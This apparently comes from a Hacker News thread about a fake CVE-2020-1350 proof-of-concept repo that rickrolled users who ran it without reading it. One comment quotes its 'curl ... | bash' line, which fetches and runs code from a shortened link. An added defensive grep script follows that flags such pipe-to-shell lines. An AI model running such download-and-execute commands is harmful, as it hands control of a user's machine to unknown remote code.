
This is very difficult to read and understand.


That's my take. Just random garbage. There is a thread of something in there, but I don't have the time/energy to quite get it. Something about a fake hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because it's too poorly organized.


Yeah, they completely fail to explain the context.

CVE-2020-1350 is a real vulnerability that was published just yesterday:

https://nvd.nist.gov/vuln/detail/CVE-2020-1350

It's a brand new vuln so people would be interested in a proof of concept. The author created a git repo that was nominally a PoC exploit for this vulnerability but was really just a troll, and publicized it on Twitter.

Some people ran the "proof of concept" code without reading it first and got trolled. If the author had been malicious they could have done something much worse than rickrolling.

The repo also contains a real fix for the vulnerability.

This is a particularly "amusing" troll because the sort of people who keep up with CVEs and look for proof-of-concept exploits should really know better than to run random code they just got off GitHub without checking what it does.

It's obvious with the most cursory examination of the code in the repo that you shouldn't run it; exploit.sh contains:

   curl -L https://bit.ly/3exifav | bash
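
As an added example (not part of the comment above, nor code from the repo it discusses): a pre-run check that scans a cloned PoC directory for download-and-execute lines like the one quoted from exploit.sh. The function name `scan_poc`, the two patterns and the sample directory are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: static check of a cloned PoC repo before anything in it is run.
# scan_poc, the patterns and the sample data are illustrative assumptions.

# curl/wget output piped straight into a shell interpreter.
PIPE_TO_SHELL='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)'
# URL shorteners hide the real download location (short, non-exhaustive list).
SHORTENER='https?://(bit\.ly|tinyurl\.com|t\.co|is\.gd)/'

# Print file:line:text for every suspicious line under $1.
# Returns 1 if anything was flagged, 0 if nothing matched.
scan_poc() {
    local dir=$1 hits
    hits=$(grep -rnIE --exclude-dir=.git \
               -e "$PIPE_TO_SHELL" -e "$SHORTENER" -- "$dir" || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Constructed sample: a directory holding the one line quoted from exploit.sh.
# The line is only written to disk and grepped, never executed or fetched.
sample=$(mktemp -d)
printf '#!/bin/bash\ncurl -L https://bit.ly/3exifav | bash\n' > "$sample/exploit.sh"
printf 'A fix and a "PoC" for the CVE.\n' > "$sample/README.md"

if scan_poc "$sample"; then
    echo "no download-and-execute lines found (not proof the code is safe)"
else
    echo "flagged: read these lines before running anything from this repo"
fi
rm -rf "$sample"
```

A clean result only means this one pattern was not found; it does not replace reading the code.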


Looks like someone posted a fake exploit and people ran it.


You need a few clicks to get to the meat (Rick Astley, of course): https://github.com/ZephrFish/CVE-2020-1350/blob/master/explo...



I came here hoping that someone would explain what is really going on. Now I feel a bit better since I am not the only one.



